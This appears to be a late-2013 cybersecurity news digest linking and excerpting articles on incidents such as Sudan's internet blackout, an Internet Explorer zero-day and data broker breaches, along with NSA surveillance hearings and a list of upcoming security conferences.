skip navigation

More signal. Less noise.

Daily briefing.

Sudan's Internet is back up. Hacktivists with Palestinian sympathies threaten to attack Israeli networks over the weekend, and an Iranian hacker for some reason defaces the website of New York University's Asian/Pacific/American Institute.

Icefog's "mercenaries" prompt concern about more smash-and-grab APTs.

Mailbox runs Javascript from emails on iPads and iPhones, but many disagree with researcher Spagnuolo's identification of this as a flaw.

As September's IE zero-day continues to be exploited, Kaspersky reports this obvious-but-important fact: vulnerabilities left unpatched will not be left unattacked.

Trojans remain more prevalent than other forms of malware.

Last month's big DDoS attack on China's DNS may have been the inadvertent work of a guy from Qingdao.

CAPTCHA-solving tools are noticed on the black market, and security researchers realize the commodity's been there for four years.

SSNDOB's infiltration of data brokers shakes knowledge-based authentication, which is quickly achieving a password-like obsolescence (as it retains a similar faute-de-mieux utility). This and other episodes also prompt a hard look at breach disclosure (Silent Circle, for one, claims most big organizations are seriously remiss here) and threat information sharing (most enterprises would like it, but few see any obvious way of doing it).

The US Senate questioned Intelligence Community leaders yesterday, and testimony by Messrs. Clapper, Alexander, and Cole is linked below. Legislation overhauling surveillance is under development, and however the final outcome for intelligence turns out, it's unlikely to restore the status quo ante.

Some Australian experts say hacking back is legal down under (but caveat lector, Oz.)

Notes.

Today's issue includes events affecting Australia, China, France, Germany, Iran, Israel, New Zealand, Sudan, Sweden, United Kingdom, United States..

Cyber Attacks, Threats, and Vulnerabilities

Sudan's Internet Back Up After A Day In The Dark (TechCrunch) The Republic of Sudan was digitally cut off from the world today, amid government protests. The government likely cut the cord to stem outrage over the termination of fuel subsidies, though they have yet to issue an official statement on the matter. "There are 4 physical routes from Sudan to the rest of the world. So, it is unlikely that all four cables were cut. Instead it is likely that

"Resistance Hackers" threaten cyber-attack against Israel on Saturday (Ahlul Bayt News Agency) A group of resistance hackers in the Gaza Strip has threatened to launch a cyber attack against Israeli websites on the 13th anniversary of al-Aqsa Intifada (the second Palestinian uprising) next Saturday

Website of Asian/Pacific/American Institute at NYU Hacked and Defaced (Softpedia) An Iranian hacker that uses the online moniker "le4derofh4ck" (Leader of Hack) has breached the systems of the New York University. As a result of the breach, he has managed to deface the official site of the Asian/Pacific/American Institute at New York University

Rise Of The 'Hit–And–Run' APT (Dark Reading) A new model of cyberespionage is emerging that relies on cybermercenaries hired to break in, steal information, and then leave — with specific targeted information. Yet another cyberespionage gang out of Asia has been discovered working on a for-hire basis as advanced persistent threat (APT)-type attackers shift gears toward a more focused, stealthy, "smash–and–grab" strategy using contracted hackers

Stealthy New Click-Fraud Malware Related to Tor Botnet (Threatpost) A malware family, likely developed by the same authors who built a massive botnet recently discovered on the Tor network, has been revived with a stealthy new click-fraud scam

"Mailbox" app on iPads and iPhones runs JavaScript from emails — vulnerability or feature? (Naked Security) Italian computer scientist Michele Spagnuolo recently wrote about what he considered a security issue in the popular iPhone and iPad email app "Mailbox." Not everyone agreed with him

Mailbox tries (and fails) to fix Javascript security hole (Graham Cluley) The researcher who rang alarm bells about a serious Javascript security hole in the popular Mailbox iPhone app, says that there is still a problem — even though the company itself believes it has resolved the issue

IE zero–day actively being exploited in the wild: Rapid7 (ZDNet) Criminals are actively abusing the zero-day vulnerability found in Internet Explorer, with exploit code now being found in the wild. Businesses running Internet Explorer should consider taking better precautions now that code to exploit a recently discovered zero-day vulnerability in the browser is making the rounds. According to Rapid7 senior engineering manager Ross Barrett, exploit code is now being widely distributed on the web. He said that earlier this week, he saw exploit code submitted to Virus Total and Scumware

Attackers can slip malicious code into many Android apps via open Wi–Fi (Ars Technica) Connect hijacking could put users at risk of data theft, SMS abuse, and more. A vulnerability affecting older versions of Google's Android operating system may make it possible for attackers to execute malicious code on end-user smartphones that use a wide variety of apps, researchers said

Cyber criminals continue to exploit known vulnerabilities: Kaspersky (ARN) Cyber criminals still make extensive use of known vulnerabilities, even as zero-day attacks continue to rise

Report: 8 Out of 10 Users Infected With A Trojan (Dark Reading) Trojans are king: They now account for more than three-quarters of all new malware created and 80 percent of all malware infections, according to new data published this week. Some 77 percent of all new malware is a Trojan, while worms make up 11.3 percent, and viruses, 10.3 percent, of new malware, PandaLabs found in its second quarter 2013 threat report. The story is much the same for malware infections, with 79.7 percent due to Trojans, 6.7 percent due to viruses, and 6.1 percent due to worms

Amateur hacker behind DDoS attack on China? (Help Net Security) When, in late August, China's Domain Name Service was targeted by a huge DDoS attack which ultimately lead to many websites being completely inaccessible for a period of time, the questions everybody wanted answered were: who did it, and why? According to the latest information made public by Wang Minghua, an operator with the National Computer Network Emergency Response Coordination Centre of China (CNCERT/CC), the attack seems to have been tied to by a single, amateur hacker from Qingdao in the Shandong province

Hack of major data brokers weakens bank authentication (CSO) LexisNexis, Dun & Bradstreet and Kroll Background America hacks raise more doubt on the effectiveness of knowledge-based authentication. The reported hack of major consumer and business data aggregators has intensified doubts of the reliability of knowledge-based authentication widely used in the financial services industry, analysts say

DIY commercial CAPTCHA–solving automatic email account registration tool available on the underground market since 2008 (Webroot Threat Blog) With low-waged employees of unethical 'data entry' companies having already set the foundations for an efficient and systematic abuse of all the major Web properties, it shouldn't be surprising that new market segments quickly emerged to capitalize on the business opportunities offered by the (commercialized) demise of CAPTCHA as an additional human/bot differentiation technique. One of these market segments is supplying automatic (email) account registration services to potential cybercriminals while on their way to either abuse them as WHOIS contact point for their malicious/fraudulent domains, or to directly embed automatically registered accounting data into their Web-based account spamming tools

Silent Circle claims major companies not declaring data breaches (Guardian) The company which shut its secure email over privacy concerns says corporate customers have admitted regular data breaches

Unanswered questions after the KVM hacks against Santander and Barclays bank (Graham Cluley) Neira Jones is a well-known name in the world of payment security and risk management, making her the ideal person to ask some difficult questions of banks targeted in the recent KVM (Keyboard video mouse) attacks. The last few weeks have seen headlines in the UK press about cybercriminal gangs targeting the likes of Santander and Barclays bank, using social engineering techniques to install KVMs (keyboard video mouse) to spy on staff computers and steal money

Major NZ retail chain hit by phishing attack (New Zealand Herald) NetSafe is warning businesses to be on the alert after a major retail chain was targeted by overseas cyber criminals in a well-planned phishing attack that attempted to convince store staff to install rogue software on their computers

Unique Vintage Admits Security Breach (eSecurity Planet) Customers' names, e-mail addresses, phone numbers and credit card numbers were accessed

Cybercriminals exploit most news within 22 hours (Help Net Security) Cybercriminals continue to respond with lightning speed when they see an opportunity to exploit a national or global news story to spread malware. In fact criminals are inventing "breaking news" that appears to relate to high-profile current events

The Coming Risk of Scam "Obamacare" Sites (Trend Micro Simply Security) In the United States on October 1, 2013 a major provision of the Affordable Care Act (also popularly known as "Obamacare") goes into effect. The Health Insurance Exchange will go live. These sites are where people will be able to sign up for health care coverage themselves rather than through their employer. One way people will be able to sign up for coverage after October 1 is online. But because of the way this online registration will work and the type of information people will have to enter to get health care coverage, there's a real risk of a perfect storm that can make this process a bonanza for identity thieves and cybercriminals. This could be the most significant new area for phishing and identity theft in the next year in the United States. It also can give established healthcare scammers a new field to look for victims

Dictatorship 101: Don't Shut Off the Internet for a Day (Slate) The Internet monitoring firm Renesys reports that Sudan's Internet is back up after a 24-hour complete blackout…According to the firm's analysis, the fact that different service providers in the country came down at different times "implies that this event was not caused by a single catastrophic technical failure, but strongly suggests a coordinated action to remove Sudan from the Internet." Add to that, the fact that the outage occurred during the country's worst protests in about two years, in which at least 24 have been killed

ARP Spoofing And Lateral Movement (TrendLabs Security Intelligence Blog) In targeted attacks, during the lateral movement stage attacks try to gain access to other computers on the same local area network (LAN). One useful tool to achieve this is ARP spoofing, which can be used to carry out a variety of attacks to steal information as well as plant backdoors on other machines. We recently came across a tool that automates ARP attacks, as well as using these kinds of attacks to inject IFRAMEs into websites, deliver fake software updates, and disrupt SSL connections

Security Patches, Mitigations, and Software Updates

Apple releases iOS 7.0.2 — swiftly squashing two lockscreen bugs (Naked Security) Apple has quickly fixed two lockscreen bugs that it introduced with iOS 7. Well done, Cupertino! (To all hardcore Apple fans reading this: that's not irony. I really mean it.

Apple releases iOS 7.02, fixing lockscreen passcode flaw (Graham Cluley) Apple has just released a new version of iOS for iPhone and iPad users, which they claim will fix the various passcode flaws that have been embarrassing the company since the recent launch of iOS 7

Tumblr Fixes DOM XSS Bug (Industrial Safety and Security Source) There is a DOM-based cross-site scripting (XSS) vulnerability in Tumblr, a researcher found. If unfixed, the issue could end upexploited for spamming, spreading malware and phishing, said Portuguese security researcher David Sopas

Cyber Trends

Time for a Change in Security Thinking (Threatpost) Security, like a lot of other things, tends to go in phases. A new attack technique is developed, vendors respond with a new defensive technology and then attackers find a way to defeat it. It has always been that way. And right now, things seem to be in one of those periodic down cycles in which the attackers have the upper hand

Challenges faced by top CSOs (Help Net Security) (ISC)² released new data that outlines the chief challenges faced by top enterprise security executives and illustrates the broad range of complex — and sometimes conflicting — challenges faced by today's enterprise information security leaders

Security Staff Feel Largely Unprepared for Cyber–Espionage and APTs (InfoSecurity Magazine) Advanced persistent threats (APTs) are insidious, multi-pronged and stealthy — and aimed at siphoning off an organization's intellectual property. But when it comes to protecting those crown jewels, the thieves seem to be staying one step ahead of security departments

Industry leaders perceive numerous security threats to their data (Help Net Security) An overwhelming majority of business leaders believe their customers and clients worry about breaches of personal data held by their organizations. Unisys-sponsored research conducted by IDG Connect found that 91% of business decision makers surveyed were concerned about their customers' perceptions of their organization's ability to protect personal data, with 65% of decision makers reporting they believe customers are "very concerned"

Organizations fear their privacy activities are insufficient (Help Net Security) The perceived level of maturity attached to organizations' privacy activities has decreased since 2011, as many organizations deem their existing privacy activities to be inadequate, according to a survey by Gartner. The survey found that 43 percent of organizations have a comprehensive privacy management program in place, while 7 percent admitted to "doing the bare minimum" regarding privacy laws

Organizations are flying blind as they embrace cloud services (Help Net Security) Organizations lack the information to understand and mitigate a broader set of risks posed by the use of cloud services, according to Skyhigh Networks. "What we are seeing from this report is that there are no consistent policies in place to manage the security, compliance, governance, and legal risks of cloud services," said Rajiv Gupta, founder and CEO at Skyhigh Networks. "Our cloud usage analytics suggest that enterprises are taking action on the popular cloud services they know of and not on the cloud services that pose the greatest risk to their organization. Lack of visibility into the use and risk seem to be crux of the problem"

In 2020, Cyberthreats Get Physical and the Internet of Things Opens Gaping Security Holes (Infosecurity Magazine) From cloud-powered denial-of-service attacks and Big Data vulnerabilities to bio-hacks that defeat authentication systems like fingerprint recognition, we are on the cusp of a brave new world of cyber-attack exploits, Europol warns

Most CIOs grossly underestimate how many cloud apps their employees use (CITEWorld) Skyhigh Networks, the company that monitors the use of cloud services for businesses, released its first trend report about its customers. If you doubted how popular cloud services have become, this should be a real eye opener. The report shows the incredible growth of cloud services in businesses and just how clueless IT departments are about what employees are doing in the cloud

Chief Security Officers Get Down to Business (eSecurity Planet) These days the role of the chief security officer (CISO) is less about technology and more about managing business risk. As organizations see IT security within the larger context of risk management, so too is the role of the chief information security officer (CISO) taking on greater significance. Fewer and fewer CISOs have technical backgrounds, and many are moving to a more proactive footing where they seek to influence corporate strategy

39% of big data developers say government agencies are spying on our data (Venture Beat) Two out of five software engineers working on big data solutions say that government agencies are tracking the data they're collecting, creating, and analyzing. And if you only ask those who are confident they could tell if the government was indeed spying on their data, that number goes up to 59 percent. Which suggests they know — not just think — that governments are spying

Users want a seamless experience in public Wi–Fi (Help Net Security) With smartphone and tablet usage continuing to explode, operator-deployed Wi-Fi networks are playing an increasing role in keeping users connected on the go. A new study conducted in Europe on behalf of Wi-Fi Alliance indicates that advanced features such as seamless authentication, on-site enrollment of additional devices, and Wi-Fi roaming present operators with compelling opportunities to drive business value

Marketplace

Future Air Force Contracts Likely Will Include Firm Price Caps (National Defense) The Air Force is considering placing price caps on major procurement programs — that when reached —will force Pentagon buyers to rethink requirements and make tradeoffs in favor of affordability, a senior civilian with the service said Sept. 26. Richard W. Lombardi, deputy assistant secretary for acquisition integration with the office of the assistant secretary of the Air Force for acquisition, said defense officials are giving more weight to long-term affordability as they lay out a series of spending plans that will be published in coming months…Another top priority is developing a viable strategy for acquisition of cyber-related systems and weapons, Lombardi said. The cyber-realm, which is under Air Force auspices, develops at such a high speed that the Pentagon's acquisition apparatus cannot keep pace, he said

Microsoft, Facebook and Mozilla hunt for developers at HackWEEKDAY (Help Net Security) This October, developers from around the globe have an opportunity to showcase their coding skills to an international audience at the HackWEEKDAY hackathon in Kuala Lumpur

Education and skills key to cyber security, says (ISC)² (ComputerWeekly) Information security professionals are making progress, but they are still losing the race against adversaries, according to Hord Tipton, executive director of security professional certification body (ISC)². But one of the biggest challenges is the lack of skilled people to help mitigate the security risks as businesses move into mobile and cloud computing

MITRE to Run Natl Security Engineering Center for $626M (GovConWire) MITRE Corp. has received a $626.2 million contract from the U.S. Army to help manage a federally funded research and development center focused on national defense and intelligence strategies

National Governors Association directs members to DHS continuous monitoring BPA (FierceGovIT) State governments can make use of the Homeland Security Department's continuous monitoring blanket purchase agreement and may want to do so in conjunction with managed security services available through the DHS-recognized Multi-State Information Sharing and Analysis Center, says a paper from the National Governors Association

Can China Protect Itself From NSA Spying? (Atlantic) Following Edward Snowden's revelations, Beijing has kickstarted its domestic cyber-security industry. But there's still a long way to go

Products, Services, and Solutions

Google Returns to Larry and Sergey's Garage for Massive Search Revamp (Wired) If you've started to feel like Google understands you a little better, the company says that's because they've quietly rolled out the biggest revamp of search in years

Multifactor authentication available on Windows Azure (InfoWorld) Microsoft is pricing the service at $2 per month per user for unlimited authentications

Watchful Software updates its information protection solution (Help Net Security) Watchful Software released RightsWATCH 5.0, which extends the secure flow of information throughout an organization while automatically applying corporate security policies without users having to make decisions or do extra work. This ensures that classified information can be used by valid users anywhere even if they are outside of the secure network perimeter and using BYOD devices

Amazon.com released Fire OS 3.0 "Mojito" (Help Net Security) Amazon.com introduced Fire OS 3.0 "Mojito," the next generation of software and services that powers Kindle Fire tablets, with hundreds of updates and new features to give customers an OS experience with Android app compatibility

Deploy endpoint encryption technologies with Wave Cloud 2014 (Help Net Security) Wave Systems launched Wave Cloud 2014, a cloud-based service for enterprise-wide management of endpoint encryption. It includes management of Windows BitLocker and Mac FileVault in addition to self-encrypting drives (SEDs), enabling the service to handle the complete spectrum of embedded endpoint encryption technologies

CORE Impact Pro 2013 R2 gets enhanced web services capabilities (Help Net Security) CORE Security released CORE Impact Pro 2013 R2, that allows organizations to proactively test IT infrastructure and identify exactly where and how an organization's critical data can be breached

Technologies, Techniques, and Standards

Establishing The New Normal After A Breach (Dark Reading) Breach response shouldn't just be about notifications and systems clean–up — organizations can use their mistakes as learning aids to change processes and policies for lasting security success. As embarrassing and costly as a big data breach may be for an organization, many security professionals will tell you that this kind of incident may be good news in the long run for the risk posture of the business. Sometimes even after numerous warnings from security and risk advisors, the only way for senior managers to sit up and pay attention to a set of risks is to have an incident from that risk detailed blow by blow in the business press

The Ripple Effect: Containing Cryptolocker (Umbrella Security Labs) In the past, we have demonstrated use cases of massive data-driven algorithmic malware and botnet detections, given our unique visibility to the global DNS traffic. When dealing with cases of few infections and thus mostly low traffic volume (but not necessarily less impact!), making correlations and revealing patterns with little contextual information becomes both tricky and critical. Using the recent revival of the ransomware Cryptolocker, which victimized a few OpenDNS customers, we present a case study of a method that we call the Ripple Effect

How to avoid being one of the "73%" of WordPress sites vulnerable to attack (Naked Security) Researchers have concluded that 73% of the 40,000 most popular websites that use WordPress software are vulnerable to attack. But they admit they might be wrong. Even so, they still highlight an important security issue which isn't diminished one iota by their sketchiness

Cyber Resilience: Building a Defense Strategy that Works (InfoSecurity Magazine) The ISF's Steve Durbin discusses how organizations can converge cybersecurity and risk management strategies to help deal with unknown threats in cyberspace

Threat–Intel Sharing Services Emerge, But Challenges Remain (Dark Reading) A number of services to help companies analyze threats and share intelligence have popped up, but the services have to solve some key problems. Six years ago, when Mike Hamilton, the chief information security officer for the City of Seattle, wanted to collaborate with other local municipalities, the federal government and critical-infrastructure providers to exchange threat information, no platform existed through which to share threat intelligence

When Internet trolls attack: A view from the receiving end (CNET) One well-known science site recently turned off reader comments altogether due to trolls and spambots. The host of CNET TV show Rumor Has It, who has dealt with her share of online abuse, ponders the move

Research and Development

'Viceroi' algorithm improves detection of click fraud (ComputerWorld) A group of researchers have devised an algorithm they say could help advertising networks better detect fraudulent clicks. Fraudsters have developed sophisticated ways to perpetrate click fraud, which involves using various methods to generate fake clicks on advertisements, defrauding advertisers. Digital marketing revenues are rapidly growing and exceeded US$36 billion in 2012 in the U.S., according to the Interactive Advertising Bureau

Assuring the integrity of voting using cryptography (Scientific American) American voters have no way of knowing that our votes have been counted, or counted correctly. We go to the polls and we punch buttons on a screen or fill out paper ballots and put them in a box, but we don't know if the electronic voting machine works correctly, if the ballot box made it to the election office, or if the ballots have been accurately tallied. The rise of electronic voting machines with secret, proprietary software has only made these problems worse

What Nanotube Computer Means To Moore's Law (InformationWeek) Stanford scientists have built a nanotube computer, an engineering feat that points to continuing advances in computational performance

Academia

Forget Foreign Languages and Music. Teach Our Kids to Code (Wired) J. Paul Gibson began to teach programming classes for teens out of frustration. A computer scientist at the National University of Ireland, he had by 1998 become shocked at the ineptness of his students. "I was seeing 18- and 19-year-olds having trouble with basic programming concepts that I myself had learned when I was 12," recalls Gibson, who taught himself to code on a Sinclair ZX81. "I realized they hadn't seen any programming in school at all up to that point. So I thought maybe one of the problems we were having is that they were coming to it too late." As word of Gibson's classes spread, primary schools in the Dublin area sought his services too

Carnegie Mellon's Information Networking Institute Receives Federal Funding for Cybersecurity Scholarships (Digital Journal) Seventeen Carnegie Mellon University graduate students were recently awarded scholarships in cybersecurity from the National Science Foundation, the Department of Homeland Security's CyberCorps Scholarship for Service (SFS) Program and the Department of Defense's Information Assurance Scholarship Program (IASP). The SFS awards went to nine students in CMU's Information Networking Institute (INI) and six students at CMU's Heinz College. The IASP awards went to two INI students

Legislation, Policy, and Regulation

Senators introduce reform initiative in light of aggressive NSA surveillance (SC Magazine) Extensive National Security Agency (NSA) surveillance has led four senators to introduce the Intelligence Oversight and Surveillance Act, a reform initiative designed to maintain privacy without impeding security. Senators Ron Wyden (D-Ore.), Mark Udall (D-Colo.), Richard Blumenthal (D-Conn.), and Rand Paul (R-Ky.) spoke live Wednesday about the proposal, which will amend the Foreign Intelligence Surveillance Act (FISA) and seek to improve the Foreign Intelligence Surveillance Court (FISC)

Senate pursues law to limit NSA surveillance (Fresno Bee) Chairwoman Dianne Feinstein says the Senate Intelligence Committee is drafting legislation to limit the National Security Agency's access to U.S. phone and email data in an effort to win back public trust following disclosures about widespread domestic surveillance

Remarks as delivered by James R. Clapper, Director of National Intelligence at an Open Hearing on Foreign Intelligence Surveillance Authorities (IC on the Record) Open Hearing on Foreign Intelligence Surveillance Authorities, U. S. Senate Select Committee on Intelligence. Chairman Feinstein, Vice Chairman Chambliss, and distinguished members of the Committee. Thank you for having us here today, to talk about the way ahead, occasioned by the dramatic revelations about intelligence collection programs since their unauthorized disclosure, and about the steps we're taking to make these programs more transparent, while still protecting our national security interests

Remarks as delivered by General Keith Alexander, Director of the National Security Agency (IC on the Record) Open Hearing on Foreign Intelligence Surveillance Authorities, U. S. Senate Select Committee on Intelligence. Chairman Feinstein, Vice Chairman Chambliss, distinguished members of the committee, I am privileged today to represent the work of the dedicated professionals at the National Security Agency, who employ the authorities provided by Congress, the courts and the executive branch to help defend this nation. If we are to have a serious debate about how NSA conducts its business, we need to step away from sensational headlines and focus on the facts

Remarks as delivered by Deputy Attorney General, James Cole (IC on the Record) Open Hearing on Foreign Intelligence Surveillance Authorities, U. S. Senate Select Committee on Intelligence. Thank you, Chairman Feinstein, Vice Chairman Chambliss, distinguished members of the committee, for inviting us here today to talk about NSA's 215 business records program and Section 702 of FISA. I'm going to try and be brief and just focus my opening remarks on the 215 program

NSA: Surveillance court says no upper limit on phone records collection (ComputerWorld) The agency intends to collect all US phone records and put them in a searchable database, director Keith Alexander says

U.S. officials dodge questions on scope of surveillance (Washington Post) U.S. officials declined to directly answer lawmakers' questions on Thursday about the full scope of the National Security Agency's collection of Americans' data, including whether it has ever sought to acquire large volumes of cellphone location information or other records. NSA Director Keith Alexander dodged questions by a senior member of the Senate Intelligence Committee about whether the agency has ever tried to augment its broad collection of virtually all Americans' phone-call records by gathering data that would indicate the callers' locations. He noted that intelligence officials had given a classified answer to the question

Sen. Ron Wyden: NSA 'repeatedly deceived the American people' (Guardian) About the Snowden disclosures, the Oregon Democrat told the NSA chief: 'the truth always manages to come out.' The Senate Intelligence Committee yesterday held a hearing, ostensibly to investigate various issues raised about the NSA's activities. What the hearing primarily achieved instead was to underscore what a farce the notion of Congressional oversight over the NSA is

NSA chief defends collecting Americans' data (Washington Post) The head of the National Security Agency delivered a vigorous defense Wednesday of his agency's collection of Americans' phone records for counterterrorism purposes, asserting that the program was helpful in investigations of the Boston Marathon bombing and the suspected plots against U.S. diplomatic outposts this summer

NSA Revelations Leave Encryption Experts In A Quandry (WCAI Cape and Islands NPR) The technology world is reeling. That's after press reports earlier this month that the National Security Agency may have weakened computer software. The reason, to make it easier for the government to read encrypted messages. The stories have upset many encryption experts, the very people who help scramble digital communications to keep those messages secure

'No problem' with NSA collaboration, says NIST director (FierceGovIT) National Institute of Standards and Technology Director Patrick Gallagher again defended his agency's collaboration with the National Security Agency over cybersecurity standards development

Shutting Down The US Government Likely Won't Slow The NSA's Surveillance Activities (TechCrunch) Shutting down the U.S. government wouldn't lead to the NSA halting its controversial, and broad surveillance efforts. Leaked documents by Edward Snowden recently detailed the financial cost of the NSA and other intelligence efforts. The CIA is the most expensive chunk of the U.S. "black budget," costing $14.7 billion. The NSA costs $10.8 billion

Action on Cybersecurity Likely Delayed Until 2014 (Roll Call) Some lawmakers want to see president's initiative first. Congress almost certainly won't pass any kind of major cybersecurity legislation in 2013, according to industry officials, lobbyists and others who track the issue

Panel warns of global disparities in IT security (FierceGovIT) Disparate approaches to cybersecurity could make the global cyber envirionment less secure overall, warned panelists during a Sept. 19 event hosted by the Brookings Institution in Washington, D.C. "There's, I think, a very real concern that as the cybersecurity threat grows, and we develop palsy responses, there may arise what I call cyber security ghettos," said Allan Friedman, Brookings fellow and research director of Brookings' center for technology innovation

"Too big, too powerful and too influential"—why British lawmakers are obsessed with Google (Quartz) The British Parliament today released a report called "Supporting the creative economy." The title is snoozy but the proceedings are explosive. Google is mentioned 235 times over 70 pages of the report's first volume (pdf), which runs to 422 pages (including witness testimony). In contrast, Apple is mentioned 55 times, Facebook 53 times and Amazon a mere 21. Indeed at one point, the chair of the committee that put the report together refers to "our favourite subject of Google." Here are some highlights

California's Internet Eraser Law: Nice Idea, but It Won't Work (Slate) On Monday the governor of California signed a bill stipulating that social media sites such as Facebook, Twitter, and Tumblr allow kids under 18 to permanently erase their posts. Starting in 2015, these platforms must equip California's teenage users with the ability to delete video, text, and photo content forever--unless that content was originally uploaded by a third party or is subpoenaed. The law aims to protect a group of people prone to bad decisions from self-sabotage via drunken selfie, ignorant rant, overuse of #YOLO, and other Internet fouls we oldsters can only imagine (until we Google the names on the resumes). As state Sen. Darrell Steinberg told the Los Angeles Times, the new law offers "groundbreaking protection for our kids who often act impetuously with postings of ill-advised pictures or messages before they think through the consequences"

Task force seeks to update New York state cyber crime laws (SC Magazine) A proposal released Tuesday addresses much needed updates to New York State's white collar laws, which have remained mostly unaltered since 1965. The recommendations will aid in the enforcement of cyber crime, which is defined as any crime in which a computer, smart phone or the internet is used to commit or conceal a crime, according to the proposal released by the New York State White Collar Crime Task Force

Litigation, Investigation, and Law Enforcement

Inspector general: NSA spied on significant others (Politico) Some employees of the National Security Agency inappropriately used surveillance to snoop on significant others, the agency's inspector general says

Seymour Hersh on Obama, NSA and the 'pathetic' American media (Guardian) Seymour Hersh has got some extreme ideas on how to fix journalism — close down the news bureaus of NBC and ABC, sack 90% of editors in publishing and get back to the fundamental job of journalists which, he says, is to be an outsider

Edward Snowden's leaks are misguided — they risk exposing us to cyber–attacks (Guardian) Journalists are not best placed to identify security risks; we have to trust those who oversee the intelligence-gathering. Is Edward Snowden a hero or a criminal guilty of the most damaging espionage? It appears he is seen as both. Some will say he is a whistleblower who has fuelled the debate around the intercept of communications in cyberspace. But it was be no surprise to those who study the subject that a powerful search tool like Prism — and buffering software — is needed to find the communications of the terrorist or criminal among the billions of others

Ex–Spy Christopher Boyce on Snowden, WikiLeaks, and NSA Backdoors (Wired) A smart young dropout is welcomed into a promising career in the top secret world of U.S. defense contracting, but he's quickly shocked to discover the deception practiced by America's intelligence agencies at the highest levels. Disillusioned and outraged, he

Angry email users can take Google to court for keyword scanning, judge rules (The Verge) A group of email users can move forward with a class action lawsuit against Google for its Gmail keyword-scanning system, Judge Lucy Koh has declared. Earlier today, Koh filed a decision on Google's request to dismiss the case, which accuses it of violating anti-wiretapping laws by "reading" emails in order to display targeted advertisements. Though she agreed that aggrieved users couldn't legally bring a few of their claims to court, Google might still have run afoul of the California Invasion of Privacy Act and the federal Wiretap Act, and some of its far-reaching defenses stand little chance of success

Is hacking in self–defence legal? (Brisbane Times) In sport, sometimes the best defence is a good offence, but since hacking is considered illegal, organisations under a cyber attack only have defensive options. Or do they? A legal expert says retaliatory hacking might not be illegal in Australia. The general rule for penetration testers, or hackers who make a crust breaking into others' computers, is don't hack unless you've got consent

US government security background checks fumbled by investigators (Help Net Security) Edward Snowden's successful exfiltration of confidential NSA documents has proved that the background checks executed for government personnel in order to receive the needed security clearance are not foolproof. But how imperfect is this system? Reuters reporters have took it upon themselves to dig through court documents and press releases related to 21 cases in which US federal prosecutors convicted special agents and private contractors for making false statements that led to a person receiving the security clearance when it perhaps should not have

Payment Processors Are Government's Allies Against Fraud (American Banker) There is considerable confusion regarding the term "third party payment processors" and what they do

Why a Chinese Teenager Was Locked Up for His Tweets (Bloomberg) On Sept. 17, Yang Hui was summoned from his afternoon math class by his junior high school's vice-principal, according to an account the student provided to the state-owned Beijing News newspaper that was published on Tuesday. The 16-year-old quickly learned that he was in serious trouble. Three plainclothes and a uniformed police officer were waiting in the principal's office. They asked for his phone, interrogated him, conveyed him to the police station for further questioning and then locked him up in a local detention center. His apparent crime? He was re-tweeted

19–Year–Old Arrested for Hacking Miss Teen USA's Computer (Softpedia) The FBI has arrested Jared James Abrahams, a 19-year-old from Temacula, California, on suspicion of hacking into the computers of Miss Teen USA Cassidy Wolf and others. The man is said to have hacked the computers of several women to obtain compromising materials which he later used to blackmail them

For a complete running list of events, please visit the Event Tracker on the CyberWire website.

Upcoming Events

Cyber Education Symposium (Arlington, Virginia, USA, November 19 - 20, 2013) Both the public and the private sectors suffer from a lack of highly trained and effective cyber security leaders. In response, the government, businesses, and academic institutions are all exploring ways...

Information Security Conference (Charleston, West Virginia, USA, October 2, 2013) On October 2, the WVOT Office of Information Security and Controls, will be sponsoring a no-charge information and cyber security awareness event at the Charleston Civic Center. The agenda will offer...

NSU Hosts FBI Presentation on National Cyber Security Awareness (Fort Lauderdale, Florida, USA, October 3, 2013) GSCIS Hosts the Federal Bureau of Investigation (FBI) Special Agents special presentation on "National Cyber Security Awareness." RSVP at the link.

The Monktoberfest (Portland, Maine, USA, October 4, 2013) Our speakers will explore how social trends can change the way we build and use technology, and how technology in turn can change the way we socialize.

Suits and Spooks NYC 2013 (New York, New York, October 5, 2013) Since the landscape is foggy, the threat actors numerous and hard to identify, and the attacks proliferating on a daily basis, the focus of the next Suits and Spooks conference will be to identify non-state...

Forensics and Incident Response Summit EU (Prague, Czech Republic, October 6 - 13, 2013) The Summit will focus on high quality and extremely relevant content as well as panel discussions in Digital Forensics and Incident Response. In addition, we encourage you to take every opportunity to...

CyberMaryland 2013 (Baltimore, Maryland, USA, October 8 - 9, 2013) Join cybersecurity leaders, luminaries and rising stars at CyberMaryland 2013. This two-day event at the epicenter of the nation's cybersecurity innovation and education, will create opportunities for...

2013 Maryland Cyber Challenge (Baltimore, Maryland, USA, October 8 - 9, 2013) Held in conjunction with Cyber Maryland and intended to let students and young professionals showcase their cybersecurity skills, Maryland Cyber Challenge offers competition in three divisions: high school,...

AFCEA Hill AFB Technology & Cyber Security Expo (Ogden, Utah, USA, October 9, 2013) The purpose of this first-time event is to allow base personnel the opportunity to learn about the latest computer security trends, network with peers, share remediation strategies and to view and demo...

NSU's Raising Savvy Cyber Kids with Ben Halpert (Fort Lauderdale, Florida, USA, October 10, 2013) Ben Halpert is an award-winning author of several books for diverse audiences. The Savvy Cyber Kids At Home: The Family Gets A Computer (October, 2010) is a picture book that teaches the concepts of online...

International Conference on Cyber–Enabled Distributed Computing and Knowledge Discovery (Shanghai, China, October 10 - 12, 2013) International Conference on Cyber-enabled distributed computing and knowledge discovery -promotes research and development of the cyber-related technology. It is unique and significant that spans through...

VizSec 2013 (Atlanta, Georgia, USA, October 14, 2013) VizSec brings together researchers and practitioners in information visualization and security to address the specific needs of the cyber security community through new and insightful visualization techniques.

Hack-in-the-Box Security Conference 2013 (Kuala Lumpur, Malaysia, October 14 - 17, 2013) The 11th annual HITB Security Conference (16th/17th October) will be a triple track offering featuring keynotes by Andy Ellis, Chief Security Officer at Akamai and Joe Sullivan, Chief Security Officer...

USDA Cyber Security Symposium and Expo 2013 (Washington, DC, USA, October 15, 2013) The Cybersecurity Expo, running in conjunction with the Summit, will allow exhibitors the opportunity to provide live demos and share information with government personnel and industry partners. Summit...

SNW Fall 2013 (Long Beach, California, USA, October 15 - 17, 2013) SNW is the world's largest independently produced conference series focused on the evolution of architecture for a new world of mobility, Big Data and business agility. Produced by Computerworld -- and...

Hexis Exchange (Athens, Greece, October 16 - 17, 2013) Attendees will have the opportunity to participate in a knowledge exchange of the latest enterprise security topics through expert led business and technology forums, hands-on sessions, and training. Such...

Cybersecurity Symposium: "Protect. Defend. Educate." (Linthicum, Maryland, USA, October 16 - 17, 2013) The Cybersecurity Symposium being held October 16-17, 2013, will deliver first-class training for government and industry security professionals while simultaneously offering high-level keynote speakers,...

